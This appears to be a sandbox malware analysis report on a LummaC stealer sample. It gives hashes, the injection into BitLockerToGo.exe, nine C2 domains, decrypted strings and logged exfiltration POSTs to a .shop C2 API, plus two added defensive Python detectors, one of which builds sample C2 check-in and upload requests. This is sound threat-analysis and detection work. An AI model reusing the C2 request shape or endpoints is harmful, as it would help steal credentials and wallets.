
Windows Analysis Report
6xmBUtHylU.exe

Overview

General Information

Sample name: 6xmBUtHylU.exe (renamed because the original name is a hash value)
Original sample name:b82c80a3ce9b5c44391d3f11307f8b8e.exe
Analysis ID:1467945
MD5:b82c80a3ce9b5c44391d3f11307f8b8e
SHA1:7480059bc051383eaaf0d83b7f39d7c4989e4dea
SHA256:ce9b5ec3693188ed91e363e55286cd212f44912b042bd83a924af2f43daaa55f
Tags:64exe

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 6xmBUtHylU.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\6xmBUtHylU.exe" MD5: B82C80A3CE9B5C44391D3F11307F8B8E)
    • BitLockerToGo.exe (PID: 3800 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
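The process tree above shows the sample spawning BitLockerToGo.exe, a signed Microsoft binary that normally lives under C:\Windows\BitLockerDiscoveryVolumeContents, and the signatures that follow ("Creates a process in suspended mode", "Allocates memory in foreign processes", "Writes to foreign memory regions", "Injects a PE file into a foreign processes") describe the child being hollowed; the C2 URLs and Yara matches are recovered from that child's memory (process index 3), not from the parent. No Sigma rule matched, so the following is an added detection example written for this report, not part of the Joe Sandbox output or of any vendor rule set. It runs over constructed Sysmon-style events (EventID 1 process creation, EventID 3 network connection) modelled on the PIDs, paths and C2 IP in the report; the list of expected parents (explorer.exe only) is an assumption.

```python
"""Flag BitLockerToGo.exe instances started by an unexpected parent and
raise severity when that same instance later makes a network connection.
Events are constructed Sysmon-like dicts, not real sandbox or host logs."""

BITLOCKERTOGO = r"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe"

# Assumption: the only parent BitLockerToGo.exe is expected to have is
# explorer.exe (a user opening a BitLocker To Go discovery volume).
EXPECTED_PARENTS = {r"c:\windows\explorer.exe"}

# Constructed sample events modelled on the report's process tree.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 6552, "ProcessGuid": "A", "ParentProcessGuid": "EXP",
     "Image": r"C:\Users\user\Desktop\6xmBUtHylU.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 3800, "ProcessGuid": "B", "ParentProcessGuid": "A",
     "Image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "ParentImage": r"C:\Users\user\Desktop\6xmBUtHylU.exe"},
    {"EventID": 3, "ProcessId": 3800, "ProcessGuid": "B",
     "Image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "DestinationIp": "188.114.96.3", "DestinationPort": 443},
    # Benign control: explorer.exe launches it and it never connects out.
    {"EventID": 1, "ProcessId": 4100, "ProcessGuid": "C", "ParentProcessGuid": "EXP",
     "Image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def detect_bitlockertogo_hollowing(events):
    """Return one alert per BitLockerToGo.exe instance whose parent is not in
    EXPECTED_PARENTS. Severity starts at "medium" (odd parent) and becomes
    "high" if the same instance later makes a network connection, because
    BitLockerToGo.exe has no legitimate reason to reach the internet.
    Instances are keyed by ProcessGuid, not PID, so PID reuse cannot merge
    two unrelated processes."""
    alerts = {}
    for ev in events:
        if ev["EventID"] != 1 or ev["Image"].lower() != BITLOCKERTOGO:
            continue
        if ev["ParentImage"].lower() in EXPECTED_PARENTS:
            continue
        alerts[ev["ProcessGuid"]] = {
            "pid": ev["ProcessId"],
            "parent_image": ev["ParentImage"],
            "severity": "medium",
            "connections": [],
        }
    # Second pass so a connection event is attributed even if it was
    # ingested before the creation event.
    for ev in events:
        if ev["EventID"] == 3 and ev["ProcessGuid"] in alerts:
            alert = alerts[ev["ProcessGuid"]]
            alert["connections"].append((ev["DestinationIp"], ev["DestinationPort"]))
            alert["severity"] = "high"
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bitlockertogo_hollowing(SAMPLE_EVENTS):
        print(alert)
```

The parent-image check alone is enough to surface this sample; the network escalation is what separates a hollowed BitLockerToGo.exe from a stray legitimate launch. In production, also require the child image to be the signed system binary (Sysmon's Hashes/Signature fields), otherwise a renamed dropper at the same path would trip the rule for the wrong reason.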
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "citizencenturygoodwk.shop"], "Build id": "LPnhqo--@SEFYALUV"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.2227392089.0000000002885000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(10 further memory-dump matches omitted in this extract)
No Sigma rule has matched
No Snort rule has matched


              AV Detection

              Source: https://citizencenturygoodwk.shop:443/apiAvira URL Cloud: Label: malware
              Source: https://citizencenturygoodwk.shop/apiAvira URL Cloud: Label: malware
              Source: 3.2.BitLockerToGo.exe.230000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "citizencenturygoodwk.shop"], "Build id": "LPnhqo--@SEFYALUV"}
              Source: citizencenturygoodwk.shopVirustotal: Detection: 9%Perma Link
              Source: 6xmBUtHylU.exeReversingLabs: Detection: 42%
              Source: 6xmBUtHylU.exeVirustotal: Detection: 30%Perma Link
              Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.0% probability
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: benchillppwo.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: publicitttyps.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: answerrsdo.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: radiationnopp.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: affecthorsedpo.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: bargainnykwo.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: bannngwko.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: bouncedgowp.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: citizencenturygoodwk.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: LPnhqo--@SEFYALUV
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00246CD0 CryptUnprotectData,3_2_00246CD0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: 6xmBUtHylU.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0024E880
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00248088
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+68h]3_2_0024709B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ecx3_2_0024709B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00250BD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+24h], 0000005Ch3_2_00263425
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]3_2_00239C30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00258C4B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]3_2_0023F490
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_00265512
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0024662A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h3_2_0024AF90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00246790
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [00273570h]3_2_0025302C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebp3_2_00231072
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+00000124h], ecx3_2_00258087
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]3_2_002400F1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00255920
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi+eax*4], dx3_2_00238130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]3_2_00238130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push edi3_2_0023C113
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_00253142
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_002699C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]3_2_00256A83
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi3_2_0024F283
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc ebx3_2_00245A90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0023E2D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax3_2_00233350
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]3_2_0024ABB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00260B80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx3_2_0024DBEE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax3_2_0024DBEE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+24h]3_2_002403C8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax3_2_00267442
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00232CA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]3_2_00252C9D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_00269CE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]3_2_002504D6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]3_2_00239510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]3_2_00239510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00233510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ecx3_2_00254E6B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, edx3_2_00254E6B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]3_2_002586C4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]3_2_002586C7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], al3_2_002397D0

              Networking

              Source: Malware configuration extractorURLs: benchillppwo.shop
              Source: Malware configuration extractorURLs: publicitttyps.shop
              Source: Malware configuration extractorURLs: answerrsdo.shop
              Source: Malware configuration extractorURLs: radiationnopp.shop
              Source: Malware configuration extractorURLs: affecthorsedpo.shop
              Source: Malware configuration extractorURLs: bargainnykwo.shop
              Source: Malware configuration extractorURLs: bannngwko.shop
              Source: Malware configuration extractorURLs: bouncedgowp.shop
              Source: Malware configuration extractorURLs: citizencenturygoodwk.shop
              Source: Joe Sandbox ViewIP Address: 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12863Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15109Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19967Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7100Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1264Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584888Host: citizencenturygoodwk.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: citizencenturygoodwk.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: citizencenturygoodwk.shop
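The HTTP evidence above, together with the extracted configuration (nine .shop C2 domains, build id LPnhqo--@SEFYALUV) and the decrypted format string lid=%s&j=%s&ver=4.0, gives a concrete shape for the C2 exchange: every request is a POST to /api with a Chrome/119 user agent, the first ones are small application/x-www-form-urlencoded check-ins, and the later ones are multipart/form-data uploads that all reuse the boundary be85de5ipdocierre1. The following classifier is an added example written for this report, not part of the Joe Sandbox output. It parses raw HTTP/1.1 requests and scores them against those indicators. The report does not show request bodies, so the check-in body used here is an assumption built from the format string and the build id, and all requests are constructed rather than taken from the pcap.

```python
"""Classify raw HTTP requests against the LummaC C2 shape seen in the
report. Requests below are constructed for illustration; the report shows
only headers, so the form-urlencoded body is an assumption."""
import re

C2_DOMAINS = {  # from the malware configuration extractor
    "benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop",
    "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop",
    "bannngwko.shop", "bouncedgowp.shop", "citizencenturygoodwk.shop",
}
BUILD_ID = "LPnhqo--@SEFYALUV"
EXFIL_BOUNDARY = "be85de5ipdocierre1"
# Decrypted format string lid=%s&j=%s&ver=4.0; the j value is treated as opaque.
CHECKIN_BODY = re.compile(r"^lid=([^&]+)&j=([^&]*)&ver=(\d+\.\d+)$")
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


def build_request(host, content_type, body, path="/api"):
    """Assemble a raw HTTP/1.1 POST with the header order the report shows."""
    return (f"POST {path} HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"Content-Type: {content_type}\r\nUser-Agent: {UA}\r\n"
            f"Content-Length: {len(body)}\r\nHost: {host}\r\n\r\n{body}")


def parse_request(raw):
    """Split a raw request into (method, path, headers, body); header names
    are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw):
    """Return None when the request does not match the C2 shape, otherwise a
    dict naming the stage ("checkin", "exfil" or "unknown") and whether the
    stronger indicators (build id in the body, fixed boundary) also matched."""
    method, path, headers, body = parse_request(raw)
    host = headers.get("host", "").lower()
    if method != "POST" or path != "/api" or host not in C2_DOMAINS:
        return None
    ctype = headers.get("content-type", "")
    result = {"host": host,
              "chrome119_ua": "Chrome/119.0.0.0" in headers.get("user-agent", "")}
    if ctype.startswith("multipart/form-data"):
        m = re.search(r"boundary=([^;\s]+)", ctype)
        result["stage"] = "exfil"
        result["boundary_match"] = bool(m) and m.group(1) == EXFIL_BOUNDARY
    elif ctype == "application/x-www-form-urlencoded":
        m = CHECKIN_BODY.match(body)
        result["stage"] = "checkin"
        result["build_id_match"] = bool(m) and m.group(1) == BUILD_ID
    else:
        result["stage"] = "unknown"
    return result


# Constructed sample traffic: a check-in, an upload, and two benign controls.
SAMPLE_REQUESTS = [
    build_request("citizencenturygoodwk.shop", "application/x-www-form-urlencoded",
                  f"lid={BUILD_ID}&j=0123456789abcdef&ver=4.0"),  # body assumed
    build_request("citizencenturygoodwk.shop",
                  f"multipart/form-data; boundary={EXFIL_BOUNDARY}",
                  f"--{EXFIL_BOUNDARY}\r\nContent-Disposition: form-data; "
                  f"name=\"file\"; filename=\"x.zip\"\r\n\r\nPK..\r\n--{EXFIL_BOUNDARY}--\r\n"),
    build_request("api.example.com", "application/x-www-form-urlencoded", "a=1"),
    build_request("citizencenturygoodwk.shop", "application/json", "{}", path="/health"),
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(classify(raw))
```

Two caveats a practitioner should keep in mind. First, all of this traffic is TLS 1.2 to 188.114.96.3 (Cloudflare), so on the wire only the SNI, the destination and the JA3 fingerprint are visible; the header-level checks above apply to decrypted proxy logs such as the sslproxydump.pcap the Yara rule matched. Second, the very first POST in the report carries a Content-Length of 8, which is too short for the lid=...&ver=4.0 format, so the classifier labels it a check-in on headers alone and only sets build_id_match when a body actually follows the decrypted format string.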
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/.
